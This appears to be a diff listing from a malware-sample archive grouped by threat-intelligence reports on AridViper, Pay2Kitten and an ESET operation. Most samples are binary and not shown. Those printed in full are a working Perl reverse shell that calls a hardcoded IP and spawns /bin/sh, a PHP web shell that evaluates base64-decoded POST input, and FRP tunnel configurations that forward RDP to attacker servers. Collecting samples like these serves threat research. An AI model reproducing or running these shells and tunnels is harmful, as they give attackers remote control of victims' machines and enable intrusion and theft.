2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2b70045d4878a20b8fca568c0b3414f2d255f3b2a7dfed85c84cf88d1b2f4e74
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2d03ff4e5d4d72afffd9bde9225fe03d6dc941982d6f3a0bbd14076a6c890247
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2d03ff4e5d4d72afffd9bde9225fe03d6dc941982d6f3a0bbd14076a6c890247
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/445ea69e361e8efd7e00cfc6c6204cb7cece7415b4eb6539c4ebf5e6b020f702
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/445ea69e361e8efd7e00cfc6c6204cb7cece7415b4eb6539c4ebf5e6b020f702
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/479742e205e1fcd9dadc600ee72f9c1e03ba6399d0a6535e558026d0fbbba07a
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/479742e205e1fcd9dadc600ee72f9c1e03ba6399d0a6535e558026d0fbbba07a
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4be7b1c2d862348ee00bcd36d7a6543f1ebb7d81f9c48f5dd05e19d6ccdfaeb5
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4be7b1c2d862348ee00bcd36d7a6543f1ebb7d81f9c48f5dd05e19d6ccdfaeb5
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4e77963ba7f70d6777a77c158fab61024f384877d78282d31ba7bbac06724b68
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4e77963ba7f70d6777a77c158fab61024f384877d78282d31ba7bbac06724b68
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/5f5af4762c073234fef6bfeaa3b9f6a04982e82a25e540116aa1f9e38223ae2b
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/707e27d94b0d37dc55d7ca12d833ebaec80b50decb218a2eb79565561a807fe6
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/707e27d94b0d37dc55d7ca12d833ebaec80b50decb218a2eb79565561a807fe6
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/80fb33854bf54ceac731aed91c677d8fb933d1593eb95447b06bd9b80f562ed2
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/80fb33854bf54ceac731aed91c677d8fb933d1593eb95447b06bd9b80f562ed2
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/9c1ebd6f1800194b29720f626d51bf8f67310c4c59e67cd12e398dde234872ca
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/9c1ebd6f1800194b29720f626d51bf8f67310c4c59e67cd12e398dde234872ca
Normal file
Binary file not shown.
1
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/README.md
Normal file
1
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/README.md
Normal file
@ -0,0 +1 @@
|
||||
https://team-cymru.com/blog/2020/12/16/mapping-out-aridviper-infrastructure-using-augurys-malware-addon/
|
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/a6f4a0400fc7eee60610c0e113802d5aa544d462d2141b93203a0f9f380f0a16
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/a6f4a0400fc7eee60610c0e113802d5aa544d462d2141b93203a0f9f380f0a16
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ab5b59331a1beeb857dc3476c3c3906869c66f4d281400bc079b07cd811959c4
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ab5b59331a1beeb857dc3476c3c3906869c66f4d281400bc079b07cd811959c4
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ae254ab021632cb583071079b2be8af62ccfc232c687a515a716ea17bfa0db9b
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/ae254ab021632cb583071079b2be8af62ccfc232c687a515a716ea17bfa0db9b
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b2ec6aeb55eb0acf12be51185e4d6b3e67e9f3931a0ce0ebbc5849f52c0d8fd3
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b2ec6aeb55eb0acf12be51185e4d6b3e67e9f3931a0ce0ebbc5849f52c0d8fd3
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b3e991914ca782b0b6f6a96d7df6d02e2388079a12e76dfacb47155fbff1084d
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b3e991914ca782b0b6f6a96d7df6d02e2388079a12e76dfacb47155fbff1084d
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b42d3deab6932e04d6a3fb059348e608f68464a6cdc1440518c1c5e66f937694
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b42d3deab6932e04d6a3fb059348e608f68464a6cdc1440518c1c5e66f937694
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b599b0327c4593a06a2e05a3373ee84c37faa6e4fd6f7e5c24544aa9192e0b43
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b599b0327c4593a06a2e05a3373ee84c37faa6e4fd6f7e5c24544aa9192e0b43
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/b61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/d08e7464fa8650e669012056548383fbadcd29a093a28eb7d0c2ba4e9036eb07
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/d08e7464fa8650e669012056548383fbadcd29a093a28eb7d0c2ba4e9036eb07
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/db1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/db1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e67d6094dd5fa5ad678a36a020225c83adf97ac995c23893ffcc476f7d1f8481
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e67d6094dd5fa5ad678a36a020225c83adf97ac995c23893ffcc476f7d1f8481
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/e869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/eda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768
Normal file
Binary file not shown.
12
2020-12-17_ClearSky-Pay2Kitten/3e35a2a6b58853ab7443aef40d22dc37c3d94848ec9f5b9ca27c1892082b4f07
Normal file
12
2020-12-17_ClearSky-Pay2Kitten/3e35a2a6b58853ab7443aef40d22dc37c3d94848ec9f5b9ca27c1892082b4f07
Normal file
@ -0,0 +1,12 @@
|
||||
[common]
|
||||
server_addr = 3.237.39.72
|
||||
server_port = 443
|
||||
tls_enable = true
|
||||
token = laksddflko986wq35029735
|
||||
|
||||
[MedaTech - Optimus]
|
||||
type = tcp
|
||||
use_encryption = true
|
||||
local_ip = 127.0.0.1
|
||||
local_port = 3389
|
||||
remote_port = 0
|
BIN
2020-12-17_ClearSky-Pay2Kitten/483fe88d70cb09361c27468b97b7f96bd667d8c915c9f004a27d4260367d551b
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/483fe88d70cb09361c27468b97b7f96bd667d8c915c9f004a27d4260367d551b
Normal file
Binary file not shown.
1
2020-12-17_ClearSky-Pay2Kitten/48edd2cd9b09de0088c34020aea0bf40e226b22d629303ecee61a19d33ef3347
Normal file
1
2020-12-17_ClearSky-Pay2Kitten/48edd2cd9b09de0088c34020aea0bf40e226b22d629303ecee61a19d33ef3347
Normal file
@ -0,0 +1 @@
|
||||
use Socket;$i="52.90.144.40";$p=8443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
|
1
2020-12-17_ClearSky-Pay2Kitten/4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
Normal file
1
2020-12-17_ClearSky-Pay2Kitten/4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
Normal file
@ -0,0 +1 @@
|
||||
<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>
|
BIN
2020-12-17_ClearSky-Pay2Kitten/55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/63e81ac3c8e438221a088bc765158006cc99b2894d4340cf73305c43d67e9627
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/63e81ac3c8e438221a088bc765158006cc99b2894d4340cf73305c43d67e9627
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/6467152f27ba0d02dbd27e20403d8c5cdd86258df927a9cdaa9630cfc1fd3883
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/6467152f27ba0d02dbd27e20403d8c5cdd86258df927a9cdaa9630cfc1fd3883
Normal file
Binary file not shown.
1
2020-12-17_ClearSky-Pay2Kitten/README.md
Normal file
1
2020-12-17_ClearSky-Pay2Kitten/README.md
Normal file
@ -0,0 +1 @@
|
||||
https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf
|
12
2020-12-17_ClearSky-Pay2Kitten/a2440df2bf11c2882d139bddf5a33bfd63dcb4b82994ac2daf7c7f08b7170647
Normal file
12
2020-12-17_ClearSky-Pay2Kitten/a2440df2bf11c2882d139bddf5a33bfd63dcb4b82994ac2daf7c7f08b7170647
Normal file
@ -0,0 +1,12 @@
|
||||
[common]
|
||||
server_addr = 54.174.216.48
|
||||
server_port = 443
|
||||
tls_enable = true
|
||||
token = laksddflko986wq35029735
|
||||
|
||||
[BMT - BMTA-BES-TRM-07]
|
||||
type = tcp
|
||||
use_encryption = true
|
||||
local_ip = 127.0.0.1
|
||||
local_port = 3389
|
||||
remote_port = 0
|
BIN
2020-12-17_ClearSky-Pay2Kitten/d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/df86cd16a3008dba00590edae31d1313bd92528aca92c4f4ea7f24000ba62547
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/df86cd16a3008dba00590edae31d1313bd92528aca92c4f4ea7f24000ba62547
Normal file
Binary file not shown.
BIN
2020-12-17_ClearSky-Pay2Kitten/ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f
Normal file
BIN
2020-12-17_ClearSky-Pay2Kitten/ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f
Normal file
Binary file not shown.
BIN
2020-12-17_ESET-Operation_SignSight_Southeast_Asia/6be34df727fcb79123e4e8f472ad24b698d83395fb17d4db019e9976f485cd83
Normal file
BIN
2020-12-17_ESET-Operation_SignSight_Southeast_Asia/6be34df727fcb79123e4e8f472ad24b698d83395fb17d4db019e9976f485cd83
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user